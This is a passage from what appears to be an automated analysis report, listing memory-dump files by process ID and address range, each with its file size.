                                                                                                            • memory/1008-218-0x000000001B330000-0x000000001B340000-memory.dmp

                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/1008-1042-0x000000001B330000-0x000000001B340000-memory.dmp

                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/1008-19-0x00000000008C0000-0x00000000008D8000-memory.dmp

                                                                                                              Filesize

                                                                                                              96KB

                                                                                                            • memory/1008-1013-0x00007FFE6B120000-0x00007FFE6BBE1000-memory.dmp

                                                                                                              Filesize

                                                                                                              10.8MB

                                                                                                            • memory/1008-25-0x00007FFE6B120000-0x00007FFE6BBE1000-memory.dmp

                                                                                                              Filesize

                                                                                                              10.8MB

                                                                                                            • memory/1320-88-0x0000000140000000-0x00000001400CF000-memory.dmp

                                                                                                              Filesize

                                                                                                              828KB

                                                                                                            • memory/1320-80-0x0000000000D10000-0x0000000000D70000-memory.dmp

                                                                                                              Filesize

                                                                                                              384KB

                                                                                                            • memory/1320-84-0x0000000140000000-0x00000001400CF000-memory.dmp

                                                                                                              Filesize

                                                                                                              828KB

                                                                                                            • memory/1320-86-0x0000000000D10000-0x0000000000D70000-memory.dmp

                                                                                                              Filesize

                                                                                                              384KB

                                                                                                            • memory/1320-74-0x0000000000D10000-0x0000000000D70000-memory.dmp

                                                                                                              Filesize

                                                                                                              384KB

                                                                                                            • memory/1664-1038-0x0000000140000000-0x0000000140234000-memory.dmp

                                                                                                              Filesize

                                                                                                              2.2MB

                                                                                                            • memory/1664-53-0x00000000007F0000-0x0000000000850000-memory.dmp

                                                                                                              Filesize

                                                                                                              384KB

                                                                                                            • memory/1664-59-0x00000000007F0000-0x0000000000850000-memory.dmp

                                                                                                              Filesize

                                                                                                              384KB

                                                                                                            • memory/1664-61-0x0000000140000000-0x0000000140234000-memory.dmp

                                                                                                              Filesize

                                                                                                              2.2MB

                                                                                                            • memory/1704-24-0x00007FFE6B120000-0x00007FFE6BBE1000-memory.dmp

                                                                                                              Filesize

                                                                                                              10.8MB

                                                                                                            • memory/1704-0-0x00007FFE6B123000-0x00007FFE6B125000-memory.dmp

                                                                                                              Filesize

                                                                                                              8KB

                                                                                                            • memory/1704-11-0x00007FFE6B120000-0x00007FFE6BBE1000-memory.dmp

                                                                                                              Filesize

                                                                                                              10.8MB

                                                                                                            • memory/1704-1-0x0000000000610000-0x00000000006D4000-memory.dmp

                                                                                                              Filesize

                                                                                                              784KB

                                                                                                            • memory/1900-49-0x0000000140000000-0x00000001400AA000-memory.dmp

                                                                                                              Filesize

                                                                                                              680KB

                                                                                                            • memory/1900-1014-0x0000000140000000-0x00000001400AA000-memory.dmp

                                                                                                              Filesize

                                                                                                              680KB

                                                                                                            • memory/1900-41-0x0000000000710000-0x0000000000770000-memory.dmp

                                                                                                              Filesize

                                                                                                              384KB

                                                                                                            • memory/1900-47-0x0000000000710000-0x0000000000770000-memory.dmp

                                                                                                              Filesize

                                                                                                              384KB

                                                                                                            • memory/1944-90-0x00000000004F0000-0x0000000000550000-memory.dmp

                                                                                                              Filesize

                                                                                                              384KB

                                                                                                            • memory/1944-1041-0x0000000140000000-0x00000001400CF000-memory.dmp

                                                                                                              Filesize

                                                                                                              828KB

                                                                                                            • memory/1944-156-0x0000000140000000-0x00000001400CF000-memory.dmp

                                                                                                              Filesize

                                                                                                              828KB

                                                                                                            • memory/1944-96-0x00000000004F0000-0x0000000000550000-memory.dmp

                                                                                                              Filesize

                                                                                                              384KB

                                                                                                            • memory/3112-269-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/3112-265-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/3112-267-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/3112-272-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/3112-266-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/3112-271-0x00007FFE88690000-0x00007FFE8874E000-memory.dmp

                                                                                                              Filesize

                                                                                                              760KB

                                                                                                            • memory/3112-270-0x00007FFE89130000-0x00007FFE89325000-memory.dmp

                                                                                                              Filesize

                                                                                                              2.0MB

                                                                                                            • memory/3112-264-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/4244-27-0x0000000000620000-0x0000000000687000-memory.dmp

                                                                                                              Filesize

                                                                                                              412KB

                                                                                                            • memory/4244-34-0x0000000000620000-0x0000000000687000-memory.dmp

                                                                                                              Filesize

                                                                                                              412KB

                                                                                                            • memory/4244-40-0x0000000000400000-0x00000000004B9000-memory.dmp

                                                                                                              Filesize

                                                                                                              740KB

                                                                                                            • memory/4244-26-0x0000000000400000-0x00000000004B9000-memory.dmp

                                                                                                              Filesize

                                                                                                              740KB

                                                                                                            • memory/4976-263-0x00007FFE88690000-0x00007FFE8874E000-memory.dmp

                                                                                                              Filesize

                                                                                                              760KB

                                                                                                            • memory/4976-262-0x00007FFE89130000-0x00007FFE89325000-memory.dmp

                                                                                                              Filesize

                                                                                                              2.0MB

                                                                                                            • memory/4976-261-0x0000021821990000-0x00000218219BA000-memory.dmp

                                                                                                              Filesize

                                                                                                              168KB

                                                                                                            • memory/4976-184-0x000002181F530000-0x000002181F552000-memory.dmp

                                                                                                              Filesize

                                                                                                              136KB